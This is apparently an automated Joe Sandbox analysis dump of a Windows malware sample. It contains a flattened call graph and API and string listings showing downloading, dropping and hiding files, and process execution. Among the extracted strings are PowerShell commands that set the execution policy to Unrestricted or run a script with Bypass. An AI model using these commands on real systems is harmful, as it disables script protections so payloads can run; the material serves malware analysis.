_invalid_parameter_noinfo_noreturn 11057->11058 11059 1000ab03 11058->11059 11060 10002cb0 _invalid_parameter_noinfo_noreturn 11059->11060 11061 1000ab12 11060->11061 11062 10002cb0 _invalid_parameter_noinfo_noreturn 11061->11062 11063 1000ab21 11062->11063 11064 10005520 DeleteFileA 11063->11064 11065 1000ab33 11064->11065 11066 10002da0 8 API calls 11065->11066 11067 1000ab4d 11066->11067 11068 10005300 31 API calls 11067->11068 11069 1000ab64 11068->11069 11070 10002cb0 _invalid_parameter_noinfo_noreturn 11069->11070 11071 1000ab76 Sleep 11070->11071 11072 1000ab8e _Smanip _Error_objects 11071->11072 11073 10012640 9 API calls 11072->11073 11074 1000addd 11073->11074 11075 10005400 9 API calls 11074->11075 11076 1000adf4 _Smanip _Error_objects 11075->11076 11077 10012640 9 API calls 11076->11077 11078 1000ae9a 11077->11078 11079 10005400 9 API calls 11078->11079 11080 1000aeb1 11079->11080 11081 10013890 9 API calls 11080->11081 11082 1000aef0 11081->11082 11083 10002cb0 _invalid_parameter_noinfo_noreturn 11082->11083 11084 1000af02 11083->11084 11085 10012620 _invalid_parameter_noinfo_noreturn 11084->11085 11086 1000af11 11085->11086 11087 10002cb0 _invalid_parameter_noinfo_noreturn 11086->11087 11088 1000af20 11087->11088 11089 10012620 _invalid_parameter_noinfo_noreturn 11088->11089 11090 1000af2f 11089->11090 11091 1000af3d WinExec Sleep 11090->11091 11092 1000af5b _Smanip _Error_objects 11091->11092 11093 10012640 9 API calls 11092->11093 11094 1000b07c 11093->11094 11095 10005400 9 API calls 11094->11095 11096 1000b093 11095->11096 11097 10012620 _invalid_parameter_noinfo_noreturn 11096->11097 11098 1000b0a5 _Smanip _Error_objects 11097->11098 11099 10012640 9 API calls 11098->11099 11100 1000b118 11099->11100 11101 10005400 9 API calls 11100->11101 11102 1000b12f 11101->11102 11103 10003bc0 10 API calls 11102->11103 11104 1000b162 11103->11104 11105 10003b90 10 API calls 11104->11105 11106 1000b1a1 11105->11106 11107 10002cd0 
_invalid_parameter_noinfo_noreturn 11106->11107 11108 1000b1bc 11107->11108 11109 10002cb0 _invalid_parameter_noinfo_noreturn 11108->11109 11110 1000b1c7 11109->11110 11111 10002cb0 _invalid_parameter_noinfo_noreturn 11110->11111 11112 1000b1d6 11111->11112 11113 10002cb0 _invalid_parameter_noinfo_noreturn 11112->11113 11114 1000b1e5 11113->11114 11115 10012620 _invalid_parameter_noinfo_noreturn 11114->11115 11116 1000b1f4 memset 11115->11116 11117 10002b60 11116->11117 11118 1000b245 ShellExecuteExA 11117->11118 11119 1000b270 11118->11119 11120 1000b29b 11118->11120 11122 1000b279 WaitForSingleObject CloseHandle 11119->11122 11176 1000b296 11119->11176 11121 10002cb0 _invalid_parameter_noinfo_noreturn 11120->11121 11123 1000b2b4 11121->11123 11122->11176 11125 10002cb0 _invalid_parameter_noinfo_noreturn 11123->11125 11124 1000b3a3 Sleep 11126 1000b3ba 11124->11126 11127 1000b2c3 11125->11127 11128 10002da0 8 API calls 11126->11128 11129 10002cb0 _invalid_parameter_noinfo_noreturn 11127->11129 11130 1000b3c6 11128->11130 11131 1000b2d2 11129->11131 11260 10005740 11130->11260 11133 10002cb0 _invalid_parameter_noinfo_noreturn 11131->11133 11135 1000b2e1 11133->11135 11134 1000b3d6 11136 10002cb0 _invalid_parameter_noinfo_noreturn 11134->11136 11137 10002cb0 _invalid_parameter_noinfo_noreturn 11135->11137 11138 1000b3e8 11136->11138 11139 1000b2f0 11137->11139 11142 10002da0 8 API calls 11138->11142 11140 10002cb0 _invalid_parameter_noinfo_noreturn 11139->11140 11141 1000b2ff 11140->11141 11143 10002cb0 _invalid_parameter_noinfo_noreturn 11141->11143 11144 1000b400 11142->11144 11145 1000b30e 11143->11145 11147 10005740 SetFileAttributesA 11144->11147 11146 10002cb0 _invalid_parameter_noinfo_noreturn 11145->11146 11148 1000b31d 11146->11148 11149 1000b410 11147->11149 11150 10002cb0 _invalid_parameter_noinfo_noreturn 11148->11150 11151 10002cb0 _invalid_parameter_noinfo_noreturn 11149->11151 11152 1000b32c 11150->11152 11153 1000b422 11151->11153 11154 10002cb0 
_invalid_parameter_noinfo_noreturn 11152->11154 11156 10005520 DeleteFileA 11153->11156 11155 1000b33b 11154->11155 11157 10002cb0 _invalid_parameter_noinfo_noreturn 11155->11157 11158 1000b434 11156->11158 11159 1000b34a 11157->11159 11162 10005520 DeleteFileA 11158->11162 11160 10002cb0 _invalid_parameter_noinfo_noreturn 11159->11160 11161 1000b359 11160->11161 11163 10012620 _invalid_parameter_noinfo_noreturn 11161->11163 11164 1000b448 11162->11164 11165 1000b368 11163->11165 11166 10002cb0 _invalid_parameter_noinfo_noreturn 11164->11166 11167 10012620 _invalid_parameter_noinfo_noreturn 11165->11167 11168 1000b464 11166->11168 11169 1000b377 11167->11169 11170 10002cb0 _invalid_parameter_noinfo_noreturn 11168->11170 11171 10002cb0 _invalid_parameter_noinfo_noreturn 11169->11171 11172 1000b473 11170->11172 11173 1000b386 11171->11173 11175 10002cb0 _invalid_parameter_noinfo_noreturn 11172->11175 11174 10002cb0 _invalid_parameter_noinfo_noreturn 11173->11174 11174->11176 11177 1000b482 11175->11177 11176->11124 11178 1000b548 11176->11178 11179 10002cb0 _invalid_parameter_noinfo_noreturn 11177->11179 11180 1000b491 11179->11180 11181 10002cb0 _invalid_parameter_noinfo_noreturn 11180->11181 11182 1000b4a0 11181->11182 11183 10002cb0 _invalid_parameter_noinfo_noreturn 11182->11183 11184 1000b4af 11183->11184 11185 10002cb0 _invalid_parameter_noinfo_noreturn 11184->11185 11186 1000b4be 11185->11186 11187 10002cb0 _invalid_parameter_noinfo_noreturn 11186->11187 11188 1000b4cd 11187->11188 11189 10002cb0 _invalid_parameter_noinfo_noreturn 11188->11189 11190 1000b4dc 11189->11190 11191 10002cb0 _invalid_parameter_noinfo_noreturn 11190->11191 11192 1000b4eb 11191->11192 11193 10002cb0 _invalid_parameter_noinfo_noreturn 11192->11193 11194 1000b4fa 11193->11194 11195 10002cb0 _invalid_parameter_noinfo_noreturn 11194->11195 11196 1000b509 11195->11196 11197 10012620 _invalid_parameter_noinfo_noreturn 11196->11197 11198 1000b518 11197->11198 11199 10012620 
_invalid_parameter_noinfo_noreturn 11198->11199 11200 1000b527 11199->11200 11201 10002cb0 _invalid_parameter_noinfo_noreturn 11200->11201 11202 1000b536 11201->11202 11203 10002cb0 _invalid_parameter_noinfo_noreturn 11202->11203 11203->11178 11205 1000500a 11204->11205 11263 100125c0 11205->11263 11207 10005028 11210 100050db _Error_objects 11207->11210 11279 10012600 11207->11279 11269 100137c0 11210->11269 11211 100050f7 11215 10012600 9 API calls 11211->11215 11212 1000512c 11213 10012600 9 API calls 11212->11213 11216 1000515c 11213->11216 11215->11210 11218 10012600 9 API calls 11216->11218 11217 100051dd 11273 10004ee0 MultiByteToWideChar 11217->11273 11219 1000518a 11218->11219 11221 100051ef 11222 10002da0 8 API calls 11221->11222 11223 10005201 _MallocaArrayHolder 11222->11223 11224 10002cb0 _invalid_parameter_noinfo_noreturn 11223->11224 11225 1000522b 11224->11225 11226 10012620 _invalid_parameter_noinfo_noreturn 11225->11226 11227 1000523a 11226->11227 11227->10940 11231 10005280 11228->11231 11230 100052c2 11233 10002cb0 _invalid_parameter_noinfo_noreturn 11230->11233 11231->11230 11341 10012780 11231->11341 11345 100129e0 11231->11345 11234 100052e6 11233->11234 11234->10962 11406 100143c0 11235->11406 11237 100138e9 11237->10968 11239 10005531 11238->11239 11239->10974 11449 100124a0 11240->11449 11243 100053a7 11458 100053d0 11243->11458 11245 100053b9 11245->10979 11246 10005357 11247 1000536f ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J 11246->11247 11453 10012400 11247->11453 11249 10005395 11250 1000539f SetFileAttributesA 11249->11250 11250->11243 11252 100139b5 HandleT Concurrency::task_continuation_context::task_continuation_context 11251->11252 11253 100139e5 11252->11253 11552 10001410 ?_Xlength_error@std@@YAXPBD 11252->11552 11544 100146c0 11253->11544 11256 1000a87f 11257 10013a30 11256->11257 11258 100128b0 Concurrency::task_continuation_context::task_continuation_context 9 API calls 11257->11258 11259 10013a48 
11258->11259 11259->11021 11261 10002b60 11260->11261 11262 10005750 SetFileAttributesA 11261->11262 11262->11134 11265 100125cf 11263->11265 11264 100125f3 11264->11207 11265->11264 11266 100125e6 11265->11266 11282 10013090 ?_Xlength_error@std@@YAXPBD 11265->11282 11283 10013b70 11266->11283 11270 100137f5 HandleT 11269->11270 11271 10013832 _Error_objects 11270->11271 11299 10014ab0 11270->11299 11271->11217 11320 10016360 11273->11320 11275 10004f1b memset MultiByteToWideChar WideCharToMultiByte 11276 10016360 11275->11276 11277 10004f7e memset WideCharToMultiByte 11276->11277 11278 10004fc2 _MallocaArrayHolder 11277->11278 11278->11221 11321 10013c60 11279->11321 11281 100050c9 11281->11210 11281->11211 11281->11212 11282->11266 11284 10013b9d Concurrency::task_continuation_context::task_continuation_context 11283->11284 11285 10004a70 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11284->11285 11286 10013bcf 11285->11286 11291 10014bd0 11286->11291 11292 10014bf4 HandleT 11291->11292 11293 100152a0 memcpy 11292->11293 11294 10013bf5 11293->11294 11295 100142f0 11294->11295 11297 10014301 _Error_objects Concurrency::task_continuation_context::task_continuation_context 11295->11297 11296 10013c42 11296->11264 11297->11296 11298 10003a90 allocator _invalid_parameter_noinfo_noreturn 11297->11298 11298->11296 11300 10014adc Concurrency::task_continuation_context::task_continuation_context 11299->11300 11303 10014b1c Concurrency::task_continuation_context::task_continuation_context 11300->11303 11309 10001410 ?_Xlength_error@std@@YAXPBD 11300->11309 11302 10014b3f Concurrency::task_continuation_context::task_continuation_context 11310 10015250 11302->11310 11303->11302 11304 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11303->11304 11304->11302 11306 10014b8b _Error_objects 11313 100151a0 11306->11313 11309->11303 11317 100153c0 11310->11317 11314 10014bbe 11313->11314 11315 100151af 
11313->11315 11314->11271 11316 10003230 _invalid_parameter_noinfo_noreturn 11315->11316 11316->11314 11318 100152a0 memcpy 11317->11318 11319 10015264 11318->11319 11319->11306 11322 10013c93 11321->11322 11324 10013c85 11321->11324 11325 10014d00 11322->11325 11324->11281 11326 10014d2d Concurrency::task_continuation_context::task_continuation_context 11325->11326 11327 10014d6f 11326->11327 11340 10013090 ?_Xlength_error@std@@YAXPBD 11326->11340 11329 10004a70 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11327->11329 11330 10014d95 HandleT 11329->11330 11331 10014e06 11330->11331 11332 10014de8 11330->11332 11334 10014bd0 memcpy 11331->11334 11333 10014bd0 memcpy 11332->11333 11337 10014e01 11333->11337 11335 10014e1d 11334->11335 11336 10014bd0 memcpy 11335->11336 11336->11337 11338 100142f0 _invalid_parameter_noinfo_noreturn 11337->11338 11339 10014ea1 11338->11339 11339->11324 11340->11327 11342 1001279a Concurrency::task_continuation_context::task_continuation_context 11341->11342 11349 10013e30 11342->11349 11346 100129fa Concurrency::task_continuation_context::task_continuation_context 11345->11346 11356 10013280 11346->11356 11350 100127ca 11349->11350 11351 10013e3e 11349->11351 11350->11231 11351->11350 11354 100049b0 memchr 11351->11354 11355 100049e0 memcmp 11351->11355 11354->11351 11355->11351 11357 10003980 ?_Xout_of_range@std@@YAXPBD 11356->11357 11358 1001329b 11357->11358 11359 100132e0 11358->11359 11360 100132bc Concurrency::task_continuation_context::task_continuation_context 11358->11360 11361 10013361 11359->11361 11362 10013300 Concurrency::task_continuation_context::task_continuation_context 11359->11362 11376 100039e0 memcpy 11360->11376 11363 1001342d 11361->11363 11368 1001337c Concurrency::task_continuation_context::task_continuation_context 11361->11368 11377 100039e0 memcpy 11362->11377 11382 10014100 11363->11382 11366 10012a15 11366->11231 11379 100039e0 memcpy 11368->11379 11369 10013325 11378 
100039e0 memcpy 11369->11378 11372 100133f1 11380 100039e0 memcpy 11372->11380 11374 10013405 11381 100036d0 memcpy 11374->11381 11376->11366 11377->11369 11378->11366 11379->11372 11380->11374 11381->11366 11383 10014120 Concurrency::task_continuation_context::task_continuation_context 11382->11383 11385 1001412d Concurrency::task_continuation_context::task_continuation_context 11383->11385 11395 10001410 ?_Xlength_error@std@@YAXPBD 11383->11395 11386 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11385->11386 11387 10014167 HandleT _Error_objects 11386->11387 11388 1001419c HandleT 11387->11388 11389 100141ef 11387->11389 11396 10013460 11388->11396 11390 10013460 memcpy 11389->11390 11393 100141e2 Concurrency::task_continuation_context::task_continuation_context 11390->11393 11393->11366 11394 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 11394->11393 11395->11385 11403 100036d0 memcpy 11396->11403 11398 10013478 11404 100036d0 memcpy 11398->11404 11400 1001348f 11405 100036d0 memcpy 11400->11405 11402 100134b8 11402->11394 11403->11398 11404->11400 11405->11402 11407 100143da Concurrency::task_continuation_context::task_continuation_context 11406->11407 11410 100148c0 11407->11410 11411 10003980 ?_Xout_of_range@std@@YAXPBD 11410->11411 11412 100148db 11411->11412 11413 100149bc 11412->11413 11416 1001490e Concurrency::task_continuation_context::task_continuation_context 11412->11416 11425 10014ff0 11413->11425 11415 100143f1 11415->11237 11422 100039e0 memcpy 11416->11422 11418 10014980 11423 100036d0 memcpy 11418->11423 11420 10014994 11424 100036d0 memcpy 11420->11424 11422->11418 11423->11420 11424->11415 11426 10015010 Concurrency::task_continuation_context::task_continuation_context 11425->11426 11428 1001501d Concurrency::task_continuation_context::task_continuation_context 11426->11428 11438 10001410 ?_Xlength_error@std@@YAXPBD 11426->11438 11429 
100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11428->11429 11430 10015057 HandleT _Error_objects 11429->11430 11431 100150db 11430->11431 11432 1001508c HandleT 11430->11432 11433 100149f0 memcpy 11431->11433 11439 100149f0 11432->11439 11437 100150ce Concurrency::task_continuation_context::task_continuation_context 11433->11437 11436 10003910 Concurrency::task_continuation_context::task_continuation_context _invalid_parameter_noinfo_noreturn 11436->11437 11437->11415 11438->11428 11446 100036d0 memcpy 11439->11446 11441 10014a08 11447 100036d0 memcpy 11441->11447 11443 10014a1f 11448 100036d0 memcpy 11443->11448 11445 10014a42 11445->11436 11446->11441 11447->11443 11448->11445 11450 100124bb 11449->11450 11461 10012f80 11450->11461 11514 10012f10 11453->11514 11456 10012434 11456->11249 11457 10012418 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 11457->11456 11534 10012440 11458->11534 11460 100053e2 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 11460->11245 11462 10012fd0 HandleT 11461->11462 11463 10012fab ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE 11461->11463 11464 10012fe0 ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N 11462->11464 11463->11462 11471 10013680 ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE 11464->11471 11468 1001304f 11469 10013053 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 11468->11469 11470 10005333 ??Bios_base@std@ 11468->11470 11469->11470 11470->11243 11470->11246 11483 10012e40 11471->11483 11474 100135c0 11475 100135e7 11474->11475 11476 100135eb ?_Fiopen@std@@YAPAU_iobuf@@PBDHH 11474->11476 11475->11468 11476->11475 11477 1001360d 11476->11477 11478 10012e40 3 API calls 11477->11478 11479 1001361b ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2 11478->11479 11489 10013a70 ??0_Lockit@std@@QAE@H ??Bid@locale@std@ 11479->11489 11481 10013642 11499 10012cd0 
?always_noconv@codecvt_base@std@ 11481->11499 11484 10012e4f ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11483->11484 11486 10012e7f 11484->11486 11487 10012ede 11484->11487 11486->11487 11488 10012e88 _get_stream_buffer_pointers ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAPAD0PAH001 11486->11488 11487->11474 11488->11487 11503 10004cc0 11489->11503 11492 10013b47 ??1_Lockit@std@@QAE 11492->11481 11493 10013ad7 ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@ 11494 10013af5 11493->11494 11495 10013aed 11493->11495 11510 10015eef malloc 11494->11510 11507 10004c10 11495->11507 11498 10013acf 11498->11492 11500 10012cf3 HandleT 11499->11500 11501 10012ce7 11499->11501 11502 10012cfc ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11500->11502 11501->11475 11502->11501 11504 10004cd7 11503->11504 11505 10004d11 ?_Getgloballocale@locale@std@@CAPAV_Locimp@12 11504->11505 11506 10004d0c 11504->11506 11505->11506 11506->11492 11506->11493 11506->11498 11508 10004be0 std::bad_alloc::bad_alloc 11507->11508 11509 10004c1e _CxxThrowException 11508->11509 11509->11498 11511 10015f02 11510->11511 11512 10015f17 ?_Xbad_alloc@std@ 11510->11512 11511->11498 11513 10015f1d 11512->11513 11513->11498 11515 10012f22 11514->11515 11523 10012f5a 11514->11523 11524 10012c90 ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11515->11524 11518 10012e40 3 API calls 11520 10012414 11518->11520 11520->11456 11520->11457 11523->11518 11525 10012cc9 11524->11525 11526 10012caa ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00 11524->11526 11527 10012d20 11525->11527 11526->11525 11528 10012d32 Concurrency::task_continuation_context::task_continuation_context 11527->11528 11533 10012d3d fclose 11527->11533 11529 10012d8a ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD 11528->11529 11528->11533 11530 10012dbf 11529->11530 11531 10012de1 fwrite 11530->11531 11530->11533 11532 10012e00 11531->11532 11531->11533 
11532->11533 11533->11523 11537 10012390 11534->11537 11536 10012482 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE 11536->11460 11538 100123be 11537->11538 11541 100123c6 11537->11541 11539 10012c90 2 API calls 11538->11539 11539->11541 11540 100123db ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE 11540->11536 11541->11540 11542 10012f10 8 API calls 11541->11542 11543 100123da 11542->11543 11543->11540 11549 100146ec HandleT Concurrency::task_continuation_context::task_continuation_context 11544->11549 11545 10014782 HandleT Concurrency::task_continuation_context::task_continuation_context 11553 100036d0 memcpy 11545->11553 11547 100147ca 11554 100036d0 memcpy 11547->11554 11549->11545 11551 100048e0 Concurrency::task_continuation_context::task_continuation_context 6 API calls 11549->11551 11550 100147e1 _Error_objects Concurrency::task_continuation_context::task_continuation_context 11550->11256 11551->11545 11552->11253 11553->11547 11554->11550 11556 1000b5a8 11555->11556 11557 10002da0 8 API calls 11556->11557 11558 1000b5be 11557->11558 11795 10005540 GetModuleFileNameA 11558->11795 11560 1000b5d1 _Smanip _Error_objects 11561 10012640 9 API calls 11560->11561 11562 1000bc37 _Smanip _Error_objects 11561->11562 11563 10012640 9 API calls 11562->11563 11564 10010552 11563->11564 11565 10005400 9 API calls 11564->11565 11566 10010569 11565->11566 11567 10005400 9 API calls 11566->11567 11568 10010583 _Error_objects 11567->11568 11569 10004fe0 17 API calls 11568->11569 11570 100105bf 11569->11570 11571 10002cd0 _invalid_parameter_noinfo_noreturn 11570->11571 11572 100105da 11571->11572 11573 10002cb0 _invalid_parameter_noinfo_noreturn 11572->11573 11574 100105e5 11573->11574 11575 10004fe0 17 API calls 11574->11575 11576 100105f9 11575->11576 11577 10002cd0 _invalid_parameter_noinfo_noreturn 11576->11577 11578 10010614 11577->11578 11579 10002cb0 _invalid_parameter_noinfo_noreturn 11578->11579 11580 1001061f _Smanip _Error_objects 11579->11580 11581 
                                                                                                                            APIs
                                                                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 026204AE
                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 026204DE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocInfoNativeSystemVirtual
                                                                                                                            • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                                            • API String ID: 2032221330-2899676511
                                                                                                                            • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                            • Instruction ID: 0e8dead19cec794282714b72f21ed02a81c4752e8d289abefa62532313232309
                                                                                                                            • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                            • Instruction Fuzzy Hash: 72629A315087958FD724CF24C880BABBBE5FFA4704F04482DE9C99B352E7749989CB96

                                                                                                                            APIs
                                                                                                                            • InternetOpenA.WININET(URLDownloader,00000001,00000000,00000000,00000000), ref: 100020D3
                                                                                                                            • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 100020EF
                                                                                                                            • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,1001844C,?,?,10017512,000000FF), ref: 10002101
                                                                                                                            • HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 10002136
                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 10002153
                                                                                                                              • Part of subcall function 10001D60: VariantInit.OLEAUT32(?), ref: 10001D6B
                                                                                                                              • Part of subcall function 10001D80: VariantClear.OLEAUT32(10002776), ref: 10001D8B
                                                                                                                              • Part of subcall function 10001A20: _com_issue_error.COMSUPP ref: 10001A92
                                                                                                                            • InternetReadFile.WININET(?,?,00001000,?), ref: 1000216E
                                                                                                                            • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 10002197
                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 10002230
                                                                                                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 10002240
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 1000224D
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 10002257
                                                                                                                            • GetParent.USER32(?), ref: 10002261
                                                                                                                            • ShowWindow.USER32(?,00000000,?,000000FF), ref: 10002270
                                                                                                                            • WaitForSingleObject.KERNEL32(00000550,00007530,?,000000FF), ref: 10002282
                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,?,000000FF), ref: 1000228C
                                                                                                                            • CoCreateInstance.OLE32(1001837C,00000000,00000001,1001836C,00000000), ref: 100022AE
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 1000291A
                                                                                                                              • Part of subcall function 10001E30: VariantInit.OLEAUT32(?), ref: 10001EAA
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 1000287F
                                                                                                                              • Part of subcall function 10001FA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10001FAD
                                                                                                                            • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10002928
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$Variant$CloseCreateHandleInitMessageOpenSendSleep$ClearFileHttpInfoInitializeInstanceObjectParentQueryReadShowSingleSnapshotToolhelp32WaitWindow_com_issue_errorexitfclosefopenfwrite
                                                                                                                            • String ID: .NET Framework Action$.NET Framework Action$.NET Framework Action$Pou$URLDownloader
                                                                                                                            • API String ID: 2588663270-937331142
                                                                                                                            • Opcode ID: c12ea35cdda76ffe251e38f5476c27613d15eb4307dc421cda5f27cfce8636c4
                                                                                                                            • Instruction ID: 1a265d8126e776f6a60fe0a7d1a5fce7a7262b6fb56b0006430606afee9c3406
                                                                                                                            • Opcode Fuzzy Hash: c12ea35cdda76ffe251e38f5476c27613d15eb4307dc421cda5f27cfce8636c4
                                                                                                                            • Instruction Fuzzy Hash: 89427DB4E012289FDB64CF59C895BDDBBB5BF49300F1082DAE909A7355DB30AA85CF50

                                                                                                                            APIs
                                                                                                                            • _Smanip.LIBCPMTD ref: 10005DF2
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A195
                                                                                                                              • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,?,?,000000FF), ref: 1000A35B
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A3C6
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A4D7
                                                                                                                              • Part of subcall function 10005520: DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                                                              • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                                                              • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                                                              • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                                                            • Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 1000A5D3
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A630
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A764
                                                                                                                            • Sleep.KERNEL32(000000C8,?,00000000), ref: 1000AB7C
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000ADA7
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000AE64
                                                                                                                            • WinExec.KERNEL32(00000000,00000000), ref: 1000AF3E
                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,?,00000063,?,00000070,?,?,00000000), ref: 1000AF49
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000B046
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000B0E2
                                                                                                                            • memset.VCRUNTIME140(?,00000000,00000038), ref: 1000B20A
                                                                                                                            • ShellExecuteExA.SHELL32(?), ref: 1000B266
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1000B282
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 1000B28F
                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 1000B3A8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Smanip$Sleep$FileHandle$?write@?$basic_ostream@AttributesBios_base@std@@CloseD@std@@@std@@DeleteExecExecuteObjectPathShellSingleTempU?$char_traits@V12@Waitmemset
                                                                                                                            • String ID: .NET Framework Action$/C $\PolicyManagement.xml$cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
                                                                                                                            • API String ID: 1867003993-3862442261
                                                                                                                            • Opcode ID: 80d0ebcc9d61c77f95a844ef64324c72a0714f6c8a74a08bfa52228ac4023aaa
                                                                                                                            • Instruction ID: c3f484f0cadaf97ba32f422996ffd4aa446fbc6566911116cce282fd85213db7
                                                                                                                            • Opcode Fuzzy Hash: 80d0ebcc9d61c77f95a844ef64324c72a0714f6c8a74a08bfa52228ac4023aaa
                                                                                                                            • Instruction Fuzzy Hash: 2FD36A50D0D6E8C9EB22C2288C587DDBEB55B22749F4441D9819C2A283C7BF1FD9CF66

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,?,?,000000FF), ref: 1000A35B
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A3C6
                                                                                                                              • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
                                                                                                                            • _Smanip.LIBCPMTD ref: 1000A4D7
